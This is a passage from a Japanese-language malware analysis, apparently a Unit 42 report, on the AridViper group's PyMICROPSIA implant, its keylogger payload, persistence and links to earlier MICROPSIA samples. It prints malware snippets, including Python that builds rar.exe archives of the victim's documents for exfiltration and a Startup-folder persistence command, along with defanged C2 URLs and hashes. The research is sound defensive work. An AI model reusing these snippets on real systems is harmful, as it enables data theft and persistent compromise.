251.555%;\">\u30d6\u30e9\u30a6\u30b6\u306e\u8a8d\u8a3c\u60c5\u5831\u3092\u7a83\u53d6\u3057\u3066C2\u306b\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3002<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 14.73%;\">Mulan<\/td>\n<td style=\"width: 251.555%;\">\u30d7\u30ed\u30bb\u30b9\u30ea\u30b9\u30c8\u306e\u53ce\u96c6\u3068\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3002<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 14.73%;\">Silverman<\/td>\n<td style=\"width: 251.555%;\">TXT\u5f62\u5f0f\u3067\u306e\u30d5\u30a1\u30a4\u30eb\u60c5\u5831\u306e\u53ce\u96c6\u3068\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3002<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 14.73%;\">Eeyore<\/td>\n<td style=\"width: 251.555%;\">Firefox\u306e\u30d7\u30ed\u30d5\u30a1\u30a4\u30eb\u306e\u524a\u9664\u3068\u30c7\u30d0\u30a4\u30b9\u306e\u767b\u9332\u89e3\u9664\u3002<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 14.73%;\">Pocahontas<\/td>\n<td style=\"width: 251.555%;\">JSON\u8a73\u7d30\u5f62\u5f0f\u3067\u306e\u5727\u7e2e\u6e08\u307f\u30d5\u30a1\u30a4\u30eb\u60c5\u5831\u306e\u53ce\u96c6\u3068\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3002<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 14.73%;\">InfoCinder<\/td>\n<td style=\"width: 251.555%;\">\u30b7\u30b9\u30c6\u30e0\u5185\u306e\u30c9\u30e9\u30a4\u30d6\u306b\u95a2\u3059\u308b\u60c5\u5831\u306e\u53ce\u96c6\u3068\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3002<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><sup><span style=\"color: #999999;\"><em>\u88682 \u5230\u9054\u53ef\u80fd\u306aC2\u30b3\u30de\u30f3\u30c9\u3068\u30a2\u30af\u30b7\u30e7\u30f3<\/em><\/span><\/sup><\/span><\/p>\n<h4><strong>AridViper\u306f\u65b0\u3057\u3044\u653b\u6483\u30d9\u30af\u30c8\u30eb\u306b\u53d6\u308a\u7d44\u3093\u3067\u3044\u308b\u304b?<\/strong><\/h4>\n<p>PyMICROPSIA\u306f\u3001Windows\u30aa\u30da\u30ec\u30fc\u30c6\u30a3\u30f3\u30b0\u30b7\u30b9\u30c6\u30e0\u306e\u307f\u3092\u6a19\u7684\u3068\u3059\u308b\u3088\u3046\u306b\u8a2d\u8a08\u3055\u308c\u3066\u3044\u307e\u3059\u304c\u3001\u30b3\u30fc\u30c9\u306b\u306f\u3001\"posix\"\u3084\"darwin\"\u306a\u3069\u4ed6\u306e\u30aa\u30da\u30ec\u30fc\u30c6\u30a3\u30f3\u30b0\u30b7\u30b9\u30c6\u30e0\u304b\u3069\u3046\u304b\u3092\u30c1\u30a7\u30c3\u30af\u3059\u308b\u8208\u5473\u6df1\u3044\u30b9\u30cb\u30da\u30c3\u30c8\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002\u3053\u308c\u306f\u8208\u5473\u6df1\u3044\u767a\u898b\u3067\u3059\u3002\u3053\u308c\u307e\u3067\u3053\u308c\u3089\u306e\u30aa\u30da\u30ec\u30fc\u30c6\u30a3\u30f3\u30b0\u30b7\u30b9\u30c6\u30e0\u3092\u6a19\u7684\u3068\u3059\u308bAridViper\u3092\u767a\u898b\u3057\u305f\u3053\u3068\u304c\u306a\u304f\u3001\u3053\u308c\u306f\u653b\u6483\u8005\u304c\u63a2\u5bdf\u3092\u958b\u59cb\u3057\u3088\u3046\u3068\u3057\u3066\u3044\u308b\u65b0\u3057\u3044\u9818\u57df\u3092\u8868\u3057\u3066\u3044\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n<pre class=\"lang:python decode:true \">else:\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if os.name == 'posix' and sys.platform == 'darwin':\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0PathName = os.getenv('HOME') + '\/Library\/Application Support\/Google\/Chrome\/Default\/'\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if os.path.isdir(PathName) == False:\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0sys.exit(0)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0elif os.name == 'posix':\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0PathName = os.getenv('HOME') + '\/.config\/google-chrome\/Default\/'\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if os.path.isdir(PathName) == False:\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0sys.exit(0)\r\n\u00a0\u00a0\u00a0\u00a0return PathName<\/pre>\n<p>\u73fe\u6642\u70b9\u3067\u306f\u3001\u767a\u898b\u3055\u308c\u305f\u30b3\u30fc\u30c9\u306f\u5358\u7d14\u3067\u3001Python\u30b3\u30fc\u30c9\u306e\u4f5c\u6210\u6642\u306b\u30b3\u30d4\u30fc \u30a2\u30f3\u30c9 \u30da\u30fc\u30b9\u30c8\u3057\u305f\u4e00\u90e8\u306e\u53ef\u80fd\u6027\u3082\u3042\u308a\u307e\u3059\u304c\u3001\u3044\u305a\u308c\u306b\u3057\u3066\u3082\u5f0a\u793e\u306f\u65b0\u305f\u306a\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u306e\u30ea\u30b5\u30fc\u30c1\u3067\u3053\u308c\u3092\u76e3\u8996\u3057\u3066\u3044\u304f\u4e88\u5b9a\u3067\u3059\u3002<\/p>\n<h4><strong>\u8ffd\u52a0\u306e\u30da\u30a4\u30ed\u30fc\u30c9<\/strong><\/h4>\n<p>C2\u3068\u306e\u3084\u308a\u53d6\u308a\u4e2d\u306b\u3001PyMICROPSIA\u306f2\u3064\u306e\u8ffd\u52a0\u306e\u30b5\u30f3\u30d7\u30eb\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u3001\u6a19\u7684\u306e\u30b7\u30b9\u30c6\u30e0\u306b\u30c9\u30ed\u30c3\u30d7\u3057\u3066\u5b9f\u884c\u3057\u3001\u8ffd\u52a0\u306e\u6a5f\u80fd\u3092\u5b9f\u884c\u3057\u307e\u3059\u3002\u3053\u308c\u3089\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u306fPython\u304a\u3088\u3073PyInstaller\u3092\u30d9\u30fc\u30b9\u306b\u3057\u3066\u3044\u307e\u305b\u3093\u3002<\/p>\n<h6><strong>\u30ad\u30fc\u30ed\u30ac\u30fc\u6a5f\u80fd<\/strong><\/h6>\n<p>\u3053\u308c\u306f\u30ad\u30fc\u30ed\u30ae\u30f3\u30b0\u6a5f\u80fd\u304cPyMICROPSIA\u306e\u4e00\u90e8\u3068\u3057\u3066\u30cd\u30a4\u30c6\u30a3\u30d6\u306b\u5b9f\u88c5\u3055\u308c\u3066\u3044\u306a\u3044\u8208\u5473\u6df1\u3044\u30b1\u30fc\u30b9\u3067\u3059\u3002\u4ee3\u308f\u308a\u306b\u3001\u3053\u306e\u30b5\u30f3\u30d7\u30eb\u306f\u7279\u5b9a\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u307e\u3059(\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u65b9\u6cd5\u306b\u3064\u3044\u3066\u306f\u3001\u300c\u53c2\u8003\u60c5\u5831\u300d\u306e\u300c\u30d5\u30a1\u30a4\u30eb\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u6a5f\u80fd\u300d\u306e\u30bb\u30af\u30b7\u30e7\u30f3\u3092\u53c2\u7167\u3057\u3066\u304f\u3060\u3055\u3044)\u3002<\/p>\n<p>\u3053\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u30d5\u30a1\u30a4\u30eb\u540d\"MetroIntelGenericUIFram.exe\"\u3067\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3055\u308c\u3001\u4ee5\u4e0b\u306eSHA-256\u3092\u6301\u3063\u3066\u3044\u307e\u3059\u3002<\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">381b1efca980dd744cb8d36ad44783a35d01a321593a4f39a0cdae9c7eeac52f<\/span><\/p>\n<p>\u3053\u306e\u30b5\u30f3\u30d7\u30eb\u306f\u4ee5\u4e0b\u306e<a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/win32\/api\/winuser\/nf-winuser-getasynckeystate\">GetAsyncKeyState<\/a> API\u30e1\u30bd\u30c3\u30c9\u3092\u4f7f\u7528\u3057\u3066\u30ad\u30fc\u30ed\u30ae\u30f3\u30b0\u6a5f\u80fd\u3092\u5b9f\u88c5\u3057\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_110176\" aria-describedby=\"caption-attachment-110176\" style=\"width: 830px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-110177 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/12\/word-image-191.png\" alt=\"PyMICROPSIA\u306e\u30b5\u30f3\u30d7\u30eb\u306f\u30cd\u30a4\u30c6\u30a3\u30d6\u3067\u30ad\u30fc\u30ed\u30ae\u30f3\u30b0\u6a5f\u80fd\u3092\u5b9f\u88c5\u3057\u307e\u305b\u3093\u3002\u305d\u306e\u4ee3\u308f\u308a\u306b\u3001GetAsyncKeyState API\u30e1\u30bd\u30c3\u30c9\u3092\u4f7f\u7528\u3057\u3066\u305d\u308c\u3089\u306e\u6a5f\u80fd\u3092\u5b9f\u88c5\u3057\u307e\u3059\u3002 \" width=\"830\" height=\"1200\" \/><figcaption id=\"caption-attachment-110176\" class=\"wp-caption-text\">\u56f310.\u30ad\u30fc\u30ed\u30ac\u30fcGetAsyncKey()\u30b3\u30fc\u30c9<\/figcaption><\/figure>\n<p>\u3053\u308c\u306b\u306f\u3001\u30e1\u30a4\u30f3\u306ePyMICROPSIA\u30b5\u30f3\u30d7\u30eb\u306b\u3088\u3063\u3066\u521d\u671f\u5316\u3055\u308c\u308b\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u69cb\u9020\u306b\u76f4\u63a5\u95a2\u4fc2\u3059\u308b\u30cf\u30fc\u30c9\u30b3\u30fc\u30c9\u3055\u308c\u305f\u8a2d\u5b9a\u304c\u3042\u308b\u305f\u3081\u3001\u305d\u308c\u306b\u5f93\u3063\u305f\u30b3\u30f3\u30d1\u30a4\u30eb\u304c\u5fc5\u8981\u3067\u3059\u3002\u3053\u308c\u306f\u3001PyMICROPSIA\u306b\u3088\u3063\u3066\u4f5c\u6210\u3055\u308c\u308b\u7279\u5b9a\u306e\u30c7\u30a3\u30ec\u30af\u30c8\u30ea(\u201cModelsControllerLibb\u201d)\u306e\u4e0b\u3067\u5b9f\u884c\u3059\u308b\u5fc5\u8981\u304c\u3042\u308a\u3001\"HPFusionManagerDell\"\u30d5\u30a9\u30eb\u30c0\u306e\u4e0b\u306b\u30ad\u30fc\u30b9\u30c8\u30ed\u30fc\u30af\u60c5\u5831\u3092\u683c\u7d0d\u3057\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_110178\" aria-describedby=\"caption-attachment-110178\" style=\"width: 874px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-110179 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/12\/word-image-192.png\" alt=\"\u30cf\u30fc\u30c9\u30b3\u30fc\u30c9\u3055\u308c\u305f\u8a2d\u5b9a\u30d1\u30e9\u30e1\u30fc\u30bf\u306b\u306f\u3001\u30ad\u30fc\u30b9\u30c8\u30ed\u30fc\u30af\u60c5\u5831\u306e\u683c\u7d0d\u5148\u3067\u3042\u308bHPFusionManagerDell\u30d5\u30a9\u30eb\u30c0\u304c\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002 \" width=\"874\" height=\"116\" \/><figcaption id=\"caption-attachment-110178\" class=\"wp-caption-text\">\u56f311.\u30cf\u30fc\u30c9\u30b3\u30fc\u30c9\u3055\u308c\u305f\u8a2d\u5b9a\u30d1\u30e9\u30e1\u30fc\u30bf<\/figcaption><\/figure>\n<p>\u30ad\u30fc\u30ed\u30ac\u30fc\u306f\u60c5\u5831\u3092HPFusionManagerDell\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u306b\u3001\u4ee5\u4e0b\u306e\u30d5\u30a1\u30a4\u30eb\u540d\u69cb\u9020\u3068\u5f62\u5f0f\u3067\u30c9\u30ed\u30c3\u30d7\u3057\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_110180\" aria-describedby=\"caption-attachment-110180\" style=\"width: 788px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-110181 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/12\/word-image-193.png\" alt=\"\u30ad\u30fc\u30ed\u30ac\u30fc\u306f\u60c5\u5831\u3092HPFusionManagerDell\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u306b\u3001\u3053\u3053\u306b\u793a\u3059\u30d5\u30a1\u30a4\u30eb\u540d\u69cb\u9020\u3067\u30c9\u30ed\u30c3\u30d7\u3057\u307e\u3059\u3002 \" width=\"788\" height=\"178\" \/><figcaption id=\"caption-attachment-110180\" class=\"wp-caption-text\">\u56f312.\u30ad\u30fc\u30ed\u30ac\u30fc\u306e\u51fa\u529b\u30d5\u30a1\u30a4\u30eb\u5f62\u5f0f<\/figcaption><\/figure>\n<figure id=\"attachment_110182\" aria-describedby=\"caption-attachment-110182\" style=\"width: 628px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-110183 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/12\/word-image-194.png\" alt=\"\u30ad\u30fc\u30ed\u30ac\u30fc\u306f\u60c5\u5831\u3092HPFusionManagerDell\u30c7\u30a3\u30ec\u30af\u30c8\u30ea\u306b\u3001\u3053\u3053\u306b\u793a\u3059\u5f62\u5f0f\u3067\u30c9\u30ed\u30c3\u30d7\u3057\u307e\u3059\u3002\" width=\"628\" height=\"364\" \/><figcaption id=\"caption-attachment-110182\" class=\"wp-caption-text\">\u56f313.\u30ad\u30fc\u30ed\u30ac\u30fc\u306e\u30d5\u30a1\u30a4\u30eb\u30b3\u30f3\u30c6\u30f3\u30c4\u69cb\u9020<\/figcaption><\/figure>\n<h5><strong>\u6c38\u7d9a\u5316<\/strong><\/h5>\n<p>\u3053\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u30b5\u30f3\u30d7\u30eb\u306e\u6c38\u7d9a\u5316\u306f\u3001\u4ee5\u4e0b\u306e\u3088\u3046\u306bPython\u30b3\u30fc\u30c9\u306e\u4e00\u90e8\u3068\u3057\u3066\u5b9f\u884c\u3055\u308c\u308b\u30ec\u30b8\u30b9\u30c8\u30ea\u30ad\u30fc\u306e\u8a2d\u5b9a\u306a\u3069\u3001\u901a\u5e38\u306e\u30e1\u30bd\u30c3\u30c9\u3067\u5b9f\u73fe\u53ef\u80fd\u3067\u3059\u3002<\/p>\n<figure id=\"attachment_110184\" aria-describedby=\"caption-attachment-110184\" style=\"width: 900px\" class=\"wp-caption aligncenter\"><img  class=\"wp-image-110185 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/12\/word-image-195.png\" alt=\"\u3053\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u30b5\u30f3\u30d7\u30eb\u306e\u6c38\u7d9a\u5316\u306f\u30ec\u30b8\u30b9\u30c8\u30ea\u30ad\u30fc\u306e\u8a2d\u5b9a\u306b\u3088\u3063\u3066\u5b9f\u73fe\u53ef\u80fd\u3067\u3042\u308a\u3001\u3053\u3053\u306b\u793a\u3059Python\u30b3\u30fc\u30c9\u306e\u4e00\u90e8\u3068\u3057\u3066\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002 \" width=\"900\" height=\"189\" \/><figcaption id=\"caption-attachment-110184\" class=\"wp-caption-text\">\u56f314.\u30ec\u30b8\u30b9\u30c8\u30ea\u30ad\u30fc\u306e\u6c38\u7d9a\u5316<\/figcaption><\/figure>\n<p>\u305f\u3060\u3057\u3001\u3053\u306e\u5b9f\u88c5\u306b\u304a\u3051\u308b\u6c38\u7d9a\u5316\u306b\u95a2\u3057\u3066\u8208\u5473\u6df1\u3044\u3053\u3068\u304c\u3042\u308a\u307e\u3059\u3002\u3053\u306e\u30b5\u30f3\u30d7\u30eb\u306f\u3001C2\u30b5\u30fc\u30d0\u30fc\u304b\u3089\u5225\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3057\u307e\u3059(\u8a73\u7d30\u306b\u3064\u3044\u3066\u306f\u3001\u300c\u30d5\u30a1\u30a4\u30eb\u306e\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u6a5f\u80fd\u300d\u306e\u30bb\u30af\u30b7\u30e7\u30f3\u3092\u53c2\u7167\u3057\u3066\u304f\u3060\u3055\u3044)\u3002\u3053\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u306e\u540d\u524d\u306f\"SynLocSynMomentum.exe\"\u3067\u3001\u4ee5\u4e0b\u306eSHA-256\u3092\u6301\u3063\u3066\u3044\u307e\u3059\u3002<\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">9c32fdf5af8b86049abd92561b3d281cb9aebf57d2dfef8cc2da59df82dca753<\/span><\/p>\n<p>\u3053\u306e\u30b5\u30f3\u30d7\u30eb\u306f\u4ee5\u4e0b\u306e\u7279\u5b9a\u306e\u30d1\u30e9\u30e1\u30fc\u30bf\u3067\u5b9f\u884c\u3055\u308c\u307e\u3059\u3002<\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">SynLocSynMomentum.exe ModelsControllerLibb ModelsControllerLib<\/span><\/p>\n<p>\u3053\u308c\u306f\u30b9\u30bf\u30fc\u30c8\u30a2\u30c3\u30d7\u30e1\u30cb\u30e5\u30fc\u306b\u30b3\u30d4\u30fc\u3055\u308c\u308b\u30b7\u30e7\u30fc\u30c8\u30ab\u30c3\u30c8.lnk\u306b\u3088\u3063\u3066\u6c38\u7d9a\u5316\u3092\u8a2d\u5b9a\u3057\u307e\u3059\u3002\u7279\u7b46\u3059\u3079\u304d\u70b9\u306f\u3001\u3053\u306e\u30b3\u30fc\u30c9\u304c\u3001Python\u30b3\u30fc\u30c9\u306b\u65e2\u306b\u5b58\u5728\u3057\u3066\u3044\u308b\u6a5f\u80fd\u306e\u91cf\u3092\u8003\u616e\u3057\u3066\u3001\u5225\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u3068\u3057\u3066\u5b9f\u884c\u3055\u308c\u308b\u3053\u3068\u3067\u3059\u3002<\/p>\n<pre class=\"lang:batch decode:true\">\"C:\\Windows\\System32\\cmd.exe\" \/c move \"C:\\Users\\admin\\AppData\\Local\\Temp\\\\ModelsControllerLib.lnk\" \"C:\\Users\\admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ModelsControllerLib.lnk\"<\/pre>\n<h2>\u4ed6\u306eMICROPSIA\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3068\u306e\u95a2\u4fc2<\/h2>\n<p>\u5f0a\u793e\u306f\u3001\u4e2d\u6771\u5730\u57df\u306b\u95a2\u9023\u3057\u305f\u6700\u8fd1\u306eMICROPSIA\u306e\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092\u8abf\u67fb\u4e2d\u306b\u3001PyMICROPSIA\u3092\u767a\u898b\u3057\u307e\u3057\u305f\u3002\u305d\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u306b\u306f\u4ee5\u4e0b\u306e\u4f8b\u306a\u3069\u305d\u306e\u30a2\u30af\u30c6\u30a3\u30d3\u30c6\u30a3\u3092AridViper\u306b\u95a2\u9023\u4ed8\u3051\u308b\u8907\u6570\u306e\u5074\u9762\u304c\u5b58\u5728\u3057\u3066\u3044\u307e\u3059\u3002<\/p>\n<h4><strong>\u30b3\u30fc\u30c9\u306e\u91cd\u8907<\/strong><\/h4>\n<p>\u3053\u306e\u30b5\u30f3\u30d7\u30eb\u306b\u3064\u3044\u3066\u6700\u521d\u306b\u6ce8\u76ee\u3057\u305f\u70b9\u306f\u3001\u305d\u306eC2\u306e\u5b9f\u88c5\u3068\u6a5f\u80fd\u304c\u65e2\u77e5\u306eMICROPSIA\u30b5\u30f3\u30d7\u30eb\u306b\u3088\u304f\u4f3c\u3066\u3044\u308b\u3053\u3068\u3067\u3059\u3002\u4f8b\u306b\u3064\u3044\u3066\u306f\u3001<a href=\"https:\/\/blog.radware.com\/security\/2018\/07\/micropsia-malware\/\">Radware<\/a>\u304a\u3088\u3073<a href=\"https:\/\/research.checkpoint.com\/2018\/apt-attack-middle-east-big-bang\/\">Check Point<\/a>\u306b\u3088\u308b\u4ee5\u524d\u306e\u30ea\u30b5\u30fc\u30c1\u3067\u306eC2\u306e\u8aac\u660e\u3092\u53c2\u7167\u3057\u3066\u304f\u3060\u3055\u3044\u3002<\/p>\n<p>\u307e\u305f\u3001MICROPSIA\u306e\u5404\u30b5\u30f3\u30d7\u30eb\u306b\u308f\u305f\u3063\u3066\u89b3\u6e2c\u3055\u308c\u305f\u6226\u8853\u3001\u624b\u6cd5\u3001\u624b\u9806(TTP)\u306f\u3001\u6d41\u51fa\u7528\u30c7\u30fc\u30bf\u306e\u5727\u7e2e\u306brar.exe\u304c\u4f7f\u7528\u3055\u308c\u3066\u3044\u305f\u3053\u3068\u3067\u3059\u3002\u3053\u306e\u30d0\u30fc\u30b8\u30e7\u30f3\u3067\u306f\u3001rar.exe\u306fC2\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u304b\u3089\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9\u3055\u308c\u3001\u4ee5\u524d\u306e\u30b5\u30f3\u30d7\u30eb\u3067\u89b3\u6e2c\u3055\u308c\u305f\u3082\u306e\u3068\u3088\u304f\u4f3c\u305f\u30d1\u30e9\u30e1\u30fc\u30bf\u3067\u4f7f\u7528\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<pre class=\"lang:python decode:true\">k24 = '\"' + Wv + '\\\\*.dot' + '\" '\r\nk25 = '\"' + Wv + '\\\\*.dotx' + '\" '\r\nAllFile = k1 + k2 + k3 + k4 + k5 + k6 + k7 + k8 + k9 + k11 + k12 + k13 + k14 + k15 + k16 + k17 + k18 + k19 + k20 + k21 + k22 + k23 + k24 + k25\r\nAllFiles_Drvi = AllFile\r\nflTDType = AllFiles_Drvi\r\nte = file_D\r\nEn_crpypt2 = 'a -r -ep1 -v2.5m -ta' + te + ' -hp'\r\nEn = '4545933464930447517744759'\r\nmm = chick_Device_Name() + En\r\nnnWithoutdel = En_crpypt2 + mm\r\nsubprocess.call('\"' + Rar_File + '\"' + ' ' + (nnWithoutdel + ' ' + '\"' + Zip_File2 + '_NETWORKWTHDate\"' + ' ' + flTDType), shell=True)<\/pre>\n<p><span style=\"font-family: georgia, palatino, serif;\">\u4f8b\u306b\u3064\u3044\u3066\u306f\u3001MICROPSIA\u306e\u6700\u65b0\u306e\u30b5\u30f3\u30d7\u30eb\u3067\u306erar.exe\u306e\u4f7f\u7528\u65b9\u6cd5\u3092\u53c2\u7167\u3057\u3066\u304f\u3060\u3055\u3044\u3002<\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">SHA-256: 3c8979740d2f634ff2c0c0ab7adb78fe69d6d42307118d0bb934f03974deddac<\/span><\/p>\n<pre class=\"lang:batch decode:true\">\"C:\\Program Files\\WinRAR\\Rar.exe\" a -r -ep1 -v2500k -hpcec6b597e046386f74b807c60ada61a5_d01247a1eaf1c24ffbc851e883e67f9b -ta2020-10-21 \"C:\\ProgramData\\commonlogfiles\\LMth_C\" \"C:\\Users\\admin\\*.xls\" \"C:\\Users\\admin\\*.xlsx\" \"C:\\Users\\admin\\*.doc\" \"C:\\Users\\admin\\*.docx\" \"C:\\Users\\admin\\*.csv\" \"C:\\Users\\admin\\*.pdf\" \"C:\\Users\\admin\\*.ppt\" \"C:\\Users\\admin\\*.pptx\" \"C:\\Users\\admin\\*.odt\" \"C:\\Users\\admin\\*.mdb\" \"C:\\Users\\admin\\*.accdb\" \"C:\\Users\\admin\\*.accde\" \"C:\\Users\\admin\\*.txt\" \"C:\\Users\\admin\\*.rtf\"<\/pre>\n<h4><strong>C2\u901a\u4fe1\u306e\u985e\u4f3c\u6027<\/strong><\/h4>\n<p>\u8907\u6570\u306eMICROPSIA\u30b5\u30f3\u30d7\u30eb\u3067\u89b3\u6e2c\u3055\u308c\u305fURI\u30d1\u30b9\u69cb\u9020\u306f\u3001PyMICROPSIA\u30b5\u30f3\u30d7\u30eb\u306e\u3082\u306e\u3068\u4f3c\u3066\u3044\u307e\u3059\u3002\u305f\u3068\u3048\u3070\u3001\u540c\u3058\u6700\u8fd1\u306eMICROPSIA\u30b5\u30f3\u30d7\u30eb\u3092\u8abf\u3079\u308b\u3068\u3001URI\u30d1\u30b9\u306e\u30e9\u30f3\u30c0\u30e0\u306a\u6587\u5b57\u3068\u69cb\u9020\u3092\u89b3\u6e2c\u3067\u304d\u307e\u3059\u3002<\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">SHA-256:<br \/>\n<\/span><span style=\"font-family: 'courier new', courier, monospace;\">3c8979740d2f634ff2c0c0ab7adb78fe69d6d42307118d0bb934f03974deddac<\/span><\/p>\n<p><span style=\"font-family: 'courier new', courier, monospace;\">hxxps:\/\/jaime-martinez[.]info\/sujqbrgpb\/bztjpskd\/rxkwjt<br \/>\n<\/span><span style=\"font-family: 'courier new', courier, monospace;\">hxxps:\/\/jaime-martinez[.]info\/sujqbrgpb\/bztjpskd\/zxfsyadoss\/gM69sY<br \/>\n<\/span><span style=\"font-family: 'courier new', courier, monospace;\">hxxp:\/\/jaime-martinez[.]info\/sujqbrgpb\/bztjpskd\/tpmpyyzwg<br \/>\n<\/span><span style=\"font-family: 'courier new', courier, monospace;\">hxxps:\/\/jaime-martinez[.]info\/sujqbrgpb\/bztjpskd\/ouwmhf\/ImoOEJ<br \/>\n<\/span><span style=\"font-family: 'courier new', courier, monospace;\">hxxp:\/\/jaime-martinez[.]info\/sujqbrgpb\/bztjpskd\/ouwmhf\/voT8FY<br \/>\n<\/span><span style=\"font-family: 'courier new', courier, monospace;\">hxxp:\/\/jaime-martinez[.]info\/sujqbrgpb\/bztjpskd\/rxkwjt<br \/>\n<\/span><span style=\"font-family: 'courier new', courier, monospace;\">hxxp:\/\/jaime-martinez[.]info\/sujqbrgpb\/bztjpskd\/zxfsyadoss\/TocLI5<br \/>\n<\/span><span style=\"font-family: 'courier new', courier, monospace;\">hxxps:\/\/jaime-martinez[.]info\/sujqbrgpb\/bztjpskd\/ouwmhf\/9WnKfe<br \/>\n<\/span><span style=\"font-family: 'courier new', courier, monospace;\">hxxp:\/\/jaime-martinez[.]info\/sujqbrgpb\/bztjpskd\/zxfsyadoss\/pyPaqj<br \/>\n<\/span><span style=\"font-family: 'courier new', courier, monospace;\">hxxps:\/\/jaime-martinez[.]info\/sujqbrgpb\/bztjpskd\/ouwmhf\/HRabCX<\/span><\/p>\n<h4><strong>\u4f7f\u7528\u3055\u308c\u308b\u30c6\u30fc\u30de<\/strong><\/h4>\n<p>\u904e\u53bb\u306b\u306f\u3001MICROPSIA\u306e\u30b3\u30fc\u30c9\u304a\u3088\u3073C2\u306e\u5b9f\u88c5\u3067\u306f<a href=\"https:\/\/research.checkpoint.com\/2018\/apt-attack-middle-east-big-bang\/\">The Big Bang Theory<\/a>\u3084<a href=\"https:\/\/blog.talosintelligence.com\/2017\/06\/palestine-delphi.html\">Game of Thrones<\/a>\u306a\u3069\u7279\u5b9a\u306e\u30c6\u30fc\u30de\u306e\u8a00\u53ca\u304c\u307f\u3089\u308c\u307e\u3057\u305f\u304c\u3001\u3053\u306e\u65b0\u3057\u3044\u5b9f\u88c5\u3082\u540c\u69d8\u3067\u3001\u56f315\u304a\u3088\u307316\u306e\u3088\u3046\u306b\u8907\u6570\u306e\u6709\u540d\u4ff3\u512a\u306e\u540d\u524d\u306e\u8a00\u53ca\u304c\u30b3\u30fc\u30c9\u5909\u6570\u304a\u3088\u3073\u4f7f\u7528\u3057\u3066\u3044\u308b\u30a4\u30f3\u30d5\u30e9\u30b9\u30c8\u30e9\u30af\u30c1\u30e3\u306e\u4e21\u65b9\u306b\u8907\u6570\u542b\u307e\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n<figure id=\"attachment_110186\" aria-describedby=\"caption-attachment-110186\" style=\"width: 788px\" class=\"wp-caption 